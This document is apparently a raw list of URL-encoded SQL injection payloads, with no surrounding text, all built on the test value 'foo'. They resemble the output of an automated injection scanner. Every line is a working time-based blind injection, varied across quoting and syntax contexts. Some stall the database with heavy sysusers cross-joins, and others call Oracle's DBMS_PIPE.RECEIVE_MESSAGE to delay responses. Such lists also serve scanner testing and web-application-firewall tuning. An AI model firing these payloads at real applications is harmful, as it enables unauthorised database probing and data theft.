foo%27%29%29%29%20AND%205627%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%28%27KnuE%27%3D%27KnuE foo%27%20AND%205627%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%27aSje%27%3D%27aSje foo%27%29%20AND%205627%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%27kzBU%27%20LIKE%20%27kzBU foo%27%29%29%20AND%205627%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%27Rsno%27%20LIKE%20%27Rsno foo%27%29%29%29%20AND%205627%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%28%27KHIw%27%20LIKE%20%27KHIw foo%27%20AND%205627%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%27yHTs%27%20LIKE%20%27yHTs foo%22%29%20AND%205627%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%22yzck%22%3D%22yzck foo%22%29%29%20AND%205627%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%22eAhi%22%3D%22eAhi foo%22%29%29%29%20AND%205627%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%28%22Wpwv%22%3D%22Wpwv foo%22%20AND%205627%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%22oOaX%22%3D%22oOaX foo%22%29%20AND%205627%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%22hsUH%22%20LIKE%20%22hsUH foo%22%29%29%20AND%205627%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%22zlif%22%20LIKE%20%22zlif foo%22%29%29%29%20AND%205627%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%28%28%28%22CEoe%22%20LIKE%20%22CEoe foo%22%20AND%205627%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20AND%20%22uvhE%22%20LIKE%20%22uvhE foo%29%20WHERE%209561%3D9561%20AND%205627%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29 foo%27%29%20WHERE%204946%3D4946%20AND%205627%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29 foo%27%20WHERE%208348%3D8348%20AND%205627%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29 foo%22%20WHERE%208770%3D8770%20AND%205627%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29 foo%27%20%7C%7C%20%28SELECT%203121%20FROM%20DUAL%20WHERE%202751%3D2751%20AND%205627%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20%29%20%7C%7C%20%27 foo%27%20%7C%7C%20%28SELECT%204402%20WHERE%203952%3D3952%20AND%205627%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20%29%20%7C%7C%20%27 foo%20%2B%20%28SELECT%202895%20FROM%20DUAL%20WHERE%206868%3D6868%20AND%205627%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20%29 foo%20%2B%20%28SELECT%204103%20WHERE%204079%3D4079%20AND%205627%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20%29 foo%27%20%2B%20%28SELECT%20%27ksUv%27%20FROM%20DUAL%20WHERE%207262%3D7262%20AND%205627%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20%29%20%2B%20%27 foo%27%20%2B%20%28SELECT%20%27jZuB%27%20WHERE%207239%3D7239%20AND%205627%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20%29%20%2B%20%27 foo%27%20IN%20BOOLEAN%20MODE%29%20AND%205627%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29%20%23 foo%29%20AND%209715%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- foo%27%29%20AND%209715%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- foo%27%20AND%209715%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- foo%22%20AND%209715%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- foo%29%20AND%209715%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29--%20AND%20%284192%3D4192 foo%29%29%20AND%209715%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29--%20AND%20%28%284516%3D4516 foo%29%29%29%20AND%209715%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29--%20AND%20%28%28%284197%3D4197 foo%20AND%209715%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- foo%27%29%20AND%209715%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29--%20AND%20%28%27uraU%27%3D%27uraU foo%27%29%29%20AND%209715%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29--%20AND%20%28%28%27dleT%27%3D%27dleT foo%27%29%29%29%20AND%209715%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29--%20AND%20%28%28%28%27jjuk%27%3D%27jjuk foo%27%20AND%209715%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29--%20AND%20%27RnFj%27%3D%27RnFj foo%27%29%20AND%209715%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29--%20AND%20%28%27nMgU%27%20LIKE%20%27nMgU foo%27%29%29%20AND%209715%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29--%20AND%20%28%28%27mSnQ%27%20LIKE%20%27mSnQ foo%27%29%29%29%20AND%209715%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29--%20AND%20%28%28%28%27Splq%27%20LIKE%20%27Splq foo%27%20AND%209715%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29--%20AND%20%27sZoh%27%20LIKE%20%27sZoh foo%22%29%20AND%209715%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29--%20AND%20%28%22ezJY%22%3D%22ezJY foo%22%29%29%20AND%209715%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29--%20AND%20%28%28%22egfV%22%3D%22egfV foo%22%29%29%29%20AND%209715%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29--%20AND%20%28%28%28%22MRnQ%22%3D%22MRnQ foo%22%20AND%209715%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29--%20AND%20%22aSBz%22%3D%22aSBz foo%22%29%20AND%209715%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29--%20AND%20%28%22AFfk%22%20LIKE%20%22AFfk foo%22%29%29%20AND%209715%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29--%20AND%20%28%28%22DVFE%22%20LIKE%20%22DVFE foo%22%29%29%29%20AND%209715%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29--%20AND%20%28%28%28%22yzTK%22%20LIKE%20%22yzTK foo%22%20AND%209715%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29--%20AND%20%22IUQj%22%20LIKE%20%22IUQj foo%29%20WHERE%208355%3D8355%20AND%209715%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- foo%27%29%20WHERE%208202%3D8202%20AND%209715%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- foo%27%20WHERE%208623%3D8623%20AND%209715%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- foo%22%20WHERE%207933%3D7933%20AND%209715%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29-- foo%27%20%7C%7C%20%28SELECT%201916%20FROM%20DUAL%20WHERE%205524%3D5524%20AND%209715%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29--%20%29%20%7C%7C%20%27 foo%27%20%7C%7C%20%28SELECT%202161%20WHERE%206190%3D6190%20AND%209715%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29--%20%29%20%7C%7C%20%27 foo%20%2B%20%28SELECT%202736%20FROM%20DUAL%20WHERE%207999%3D7999%20AND%209715%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29--%20%29 foo%20%2B%20%28SELECT%208594%20WHERE%201331%3D1331%20AND%209715%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29--%20%29 foo%27%20%2B%20%28SELECT%20%27zgza%27%20FROM%20DUAL%20WHERE%203556%3D3556%20AND%209715%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29--%20%29%20%2B%20%27 foo%27%20%2B%20%28SELECT%20%27nqnr%27%20WHERE%202119%3D2119%20AND%209715%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29--%20%29%20%2B%20%27 foo%27%20IN%20BOOLEAN%20MODE%29%20AND%209715%3D%28SELECT%20COUNT%28%2A%29%20FROM%20sysusers%20AS%20sys1%2Csysusers%20as%20sys2%2Csysusers%20as%20sys3%2Csysusers%20AS%20sys4%2Csysusers%20AS%20sys5%2Csysusers%20AS%20sys6%2Csysusers%20AS%20sys7%29--%20%23 foo%29%20AND%206268%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2882%29%7C%7CCHR%28119%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%2C5%29 foo%27%29%20AND%206268%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2882%29%7C%7CCHR%28119%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%2C5%29 foo%27%20AND%206268%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2882%29%7C%7CCHR%28119%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%2C5%29 foo%22%20AND%206268%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2882%29%7C%7CCHR%28119%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%2C5%29 foo%29%20AND%206268%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2882%29%7C%7CCHR%28119%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%2C5%29%20AND%20%283778%3D3778 foo%29%29%20AND%206268%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2882%29%7C%7CCHR%28119%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%2C5%29%20AND%20%28%281932%3D1932 foo%29%29%29%20AND%206268%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2882%29%7C%7CCHR%28119%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%2C5%29%20AND%20%28%28%284790%3D4790 foo%20AND%206268%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2882%29%7C%7CCHR%28119%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%2C5%29 foo%27%29%20AND%206268%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2882%29%7C%7CCHR%28119%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%2C5%29%20AND%20%28%27cYFZ%27%3D%27cYFZ foo%27%29%29%20AND%206268%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2882%29%7C%7CCHR%28119%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%2C5%29%20AND%20%28%28%27obqx%27%3D%27obqx foo%27%29%29%29%20AND%206268%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2882%29%7C%7CCHR%28119%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%2C5%29%20AND%20%28%28%28%27Bnwf%27%3D%27Bnwf foo%27%20AND%206268%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2882%29%7C%7CCHR%28119%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%2C5%29%20AND%20%27Xekx%27%3D%27Xekx foo%27%29%20AND%206268%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2882%29%7C%7CCHR%28119%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%2C5%29%20AND%20%28%27ELyu%27%20LIKE%20%27ELyu foo%27%29%29%20AND%206268%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2882%29%7C%7CCHR%28119%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%2C5%29%20AND%20%28%28%27XURI%27%20LIKE%20%27XURI foo%27%29%29%29%20AND%206268%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2882%29%7C%7CCHR%28119%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%2C5%29%20AND%20%28%28%28%27aamL%27%20LIKE%20%27aamL foo%27%20AND%206268%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2882%29%7C%7CCHR%28119%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%2C5%29%20AND%20%27Mwwe%27%20LIKE%20%27Mwwe foo%22%29%20AND%206268%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2882%29%7C%7CCHR%28119%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%2C5%29%20AND%20%28%22oApc%22%3D%22oApc foo%22%29%29%20AND%206268%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2882%29%7C%7CCHR%28119%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%2C5%29%20AND%20%28%28%22LMYm%22%3D%22LMYm foo%22%29%29%29%20AND%206268%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2882%29%7C%7CCHR%28119%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%2C5%29%20AND%20%28%28%28%22sEpw%22%3D%22sEpw foo%22%20AND%206268%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2882%29%7C%7CCHR%28119%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%2C5%29%20AND%20%22VJOo%22%3D%22VJOo foo%22%29%20AND%206268%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2882%29%7C%7CCHR%28119%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%2C5%29%20AND%20%28%22IaGS%22%20LIKE%20%22IaGS foo%22%29%29%20AND%206268%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2882%29%7C%7CCHR%28119%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%2C5%29%20AND%20%28%28%22XCsl%22%20LIKE%20%22XCsl foo%22%29%29%29%20AND%206268%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2882%29%7C%7CCHR%28119%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%2C5%29%20AND%20%28%28%28%22WvRr%22%20LIKE%20%22WvRr foo%22%20AND%206268%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2882%29%7C%7CCHR%28119%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%2C5%29%20AND%20%22BCUo%22%20LIKE%20%22BCUo foo%29%20WHERE%203922%3D3922%20AND%206268%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2882%29%7C%7CCHR%28119%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%2C5%29 foo%27%29%20WHERE%209566%3D9566%20AND%206268%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2882%29%7C%7CCHR%28119%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%2C5%29 foo%27%20WHERE%209451%3D9451%20AND%206268%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2882%29%7C%7CCHR%28119%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%2C5%29 foo%22%20WHERE%201187%3D1187%20AND%206268%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2882%29%7C%7CCHR%28119%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%2C5%29 foo%27%20%7C%7C%20%28SELECT%205402%20FROM%20DUAL%20WHERE%207922%3D7922%20AND%206268%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2882%29%7C%7CCHR%28119%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%2C5%29%20%29%20%7C%7C%20%27 foo%27%20%7C%7C%20%28SELECT%202989%20WHERE%201067%3D1067%20AND%206268%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2882%29%7C%7CCHR%28119%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%2C5%29%20%29%20%7C%7C%20%27 foo%20%2B%20%28SELECT%204240%20FROM%20DUAL%20WHERE%204363%3D4363%20AND%206268%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2882%29%7C%7CCHR%28119%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%2C5%29%20%29 foo%20%2B%20%28SELECT%207581%20WHERE%205694%3D5694%20AND%206268%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2882%29%7C%7CCHR%28119%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%2C5%29%20%29 foo%27%20%2B%20%28SELECT%20%27VDHZ%27%20FROM%20DUAL%20WHERE%206031%3D6031%20AND%206268%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2882%29%7C%7CCHR%28119%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%2C5%29%20%29%20%2B%20%27 foo%27%20%2B%20%28SELECT%20%27Gbpf%27%20WHERE%202003%3D2003%20AND%206268%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2882%29%7C%7CCHR%28119%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%2C5%29%20%29%20%2B%20%27 